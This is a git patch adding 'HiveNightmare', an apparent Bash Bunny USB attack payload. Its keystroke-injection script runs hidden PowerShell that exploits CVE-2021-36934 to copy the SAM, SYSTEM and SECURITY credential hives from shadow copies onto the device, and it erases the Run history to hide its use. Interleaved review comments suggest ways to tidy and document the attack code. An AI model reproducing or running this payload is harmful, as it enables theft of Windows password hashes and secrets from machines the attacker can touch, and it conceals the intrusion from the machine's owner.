From 605b7f1cab6e16223ada4d8feaeadeaf0ba966cc Mon Sep 17 00:00:00 2001
From: 9o3 <33983569+9o3@users.noreply.github.com>
Date: Tue, 24 Aug 2021 21:30:47 +0200
Subject: [PATCH] New payload: HiveNightmare (#462)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Leverages CVE-2021–36934 to get SAM/SYSTEM/SECURITY hives.
---
 .../exfiltration/HiveNightmare/README.md | 7 +++
 .../exfiltration/HiveNightmare/payload.txt | 48 +++++++++++++++++++
 .../exfiltration/HiveNightmare/stage2.ps1 | 26 ++++++++++
 3 files changed, 81 insertions(+)
 create mode 100644 payloads/library/exfiltration/HiveNightmare/README.md
 create mode 100644 payloads/library/exfiltration/HiveNightmare/payload.txt
 create mode 100644 payloads/library/exfiltration/HiveNightmare/stage2.ps1
diff --git a/payloads/library/exfiltration/HiveNightmare/README.md b/payloads/library/exfiltration/HiveNightmare/README.md
new file mode 100644
index 00000000..d0e732db
--- /dev/null
+++ b/payloads/library/exfiltration/HiveNightmare/README.md
@@ -0,0 +1,7 @@
+# HiveNightmare
+
+Leverages CVE-2021–36934 to get SAM/SYSTEM/SECURITY hives.
+
+## Options
+### TRIES
+> The amount of shadowcopies to search for the SAM/SYSTEM/SECURITY hives.
diff --git a/payloads/library/exfiltration/HiveNightmare/payload.txt b/payloads/library/exfiltration/HiveNightmare/payload.txt
new file mode 100644
index 00000000..8e726d08
--- /dev/null
+++ b/payloads/library/exfiltration/HiveNightmare/payload.txt
@@ -0,0 +1,48 @@
+#!/bin/bash
+#
+# Title: HiveNightmare
+# Description: Leverages CVE-2021–36934 to get SAM/SYSTEM/SECURITY hives.
+# Author: 9o3
+# Twitter: @BugBot4
+# Version: 1.0
+# Category: Exfiltration
+# Attackmodes: HID, Storage
+#
+# LED STATUS
+# ==========
+# SETUP.......Create stage file and loot folder
+# ATTACK......Run hidden PowerShell window that gets SAM/SYSTEM/SECURITY hives using shadow copies (CVE-2021-36934)
+# CLEANUP.....Remove generated files
+# FINISH......Finished
+#
+# OPTIONS
+# =======
+# TRIES => Number of shadow copies to try to find SAM/SYSTEM/SECURITY hives in.
+TRIES=10
+
+######## Create stage file and loot folder ########
+# Alter second stage based on settings & create loot folder if it does not yet exist. Removes previous DONE file if present.
+LED SETUP
+GET SWITCH_POSITION
+cd /root/udisk/payloads/$SWITCH_POSITION
+sed -e "s/<#TR#>/$TRIES/g" stage2.ps1 > 2
+mkdir -p /root/udisk/loot/HiveNightmare
+rm /root/udisk/DONE
+ATTACKMODE HID STORAGE
+
+######## Run hidden PowerShell window ########
+# Run hidden PowerShell window which executes the content of the stage2.ps1 file.
+LED ATTACK
+RUN WIN "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)"
+until [ -f /root/udisk/DONE ]
+do
+ sleep 0.2
+done
+
+######## Remove generated files ########
+# Removes the generated files and sync file system
+LED CLEANUP
+rm 2
+rm /root/udisk/DONE
+sync
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/exfiltration/HiveNightmare/stage2.ps1 b/payloads/library/exfiltration/HiveNightmare/stage2.ps1
new file mode 100644
index 00000000..2604130a
--- /dev/null
+++ b/payloads/library/exfiltration/HiveNightmare/stage2.ps1
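Review bot: The CVE identifier is written inconsistently in this hunk: the `# Description:` header line spells it with an en dash (`CVE-2021–36934`) while the `# ATTACK......` LED comment uses the ASCII hyphen (`CVE-2021-36934`). Only the hyphenated form is the identifier as published by NVD/MSRC, so the en-dash spelling will not match text searches or correlation against vulnerability databases and advisories. Change the header to `# Description: Leverages CVE-2021-36934 to get SAM/SYSTEM/SECURITY hives.`. The same en-dash spelling appears in the README hunk and in the commit message.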
@@ -0,0 +1,26 @@
+#Remove latest run entry
+$p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=gpv $p $m; rp $p $l[0]; sp $p $m $l.Substring(1);
+
+#Set variables and create loot folder
+$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
+$loot = $bb+"loot\HiveNightmare\";
+$usr = (whoami) -replace "\\","_";
+New-Item -ItemType Directory -Force -Path $loot$usr;
+
+$i = 0;
+$found = $FALSE;
+while($i -lt <#TR#>) {
+ try {
+ [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy"+$i+"\Windows\System32\config\SAM",$loot+$usr+"\SAM");
+ $found = $TRUE;
+ break;
+ } catch {$i++}
+}
+if($found){
+ [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy"+$i+"\Windows\System32\config\SYSTEM",$loot+$usr+"\SYSTEM");
+ [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy"+$i+"\Windows\System32\config\SECURITY",$loot+$usr+"\SECURITY");
+}
+
+#Let the Bash Bunny know we're done here & Eject.
+New-Item -ItemType file $bb"DONE";
+(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");
\ No newline at end of file
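Review bot: `<#TR#>` on the `while($i -lt <#TR#>)` line is a placeholder that payload.txt substitutes with the TRIES value via sed before this file is executed, but nothing in this file says so; as committed, the line is an empty block comment after `-lt` and the script does not parse on its own. Add a comment above the loop, `# <#TR#> is replaced with the TRIES value by payload.txt before execution`. Separately, `catch {$i++}` swallows every exception type, so a copy that fails for any reason other than a missing shadow copy (for example access denied on a host where the hive ACLs have been corrected) is indistinguishable from simply exhausting TRIES, and the `$found` false path leaves no record: the DONE file is still created and the payload's LED reports FINISH with an empty per-user loot folder. The header comment should document that a successful run is only indicated by the presence of the SAM/SYSTEM/SECURITY files in the loot directory.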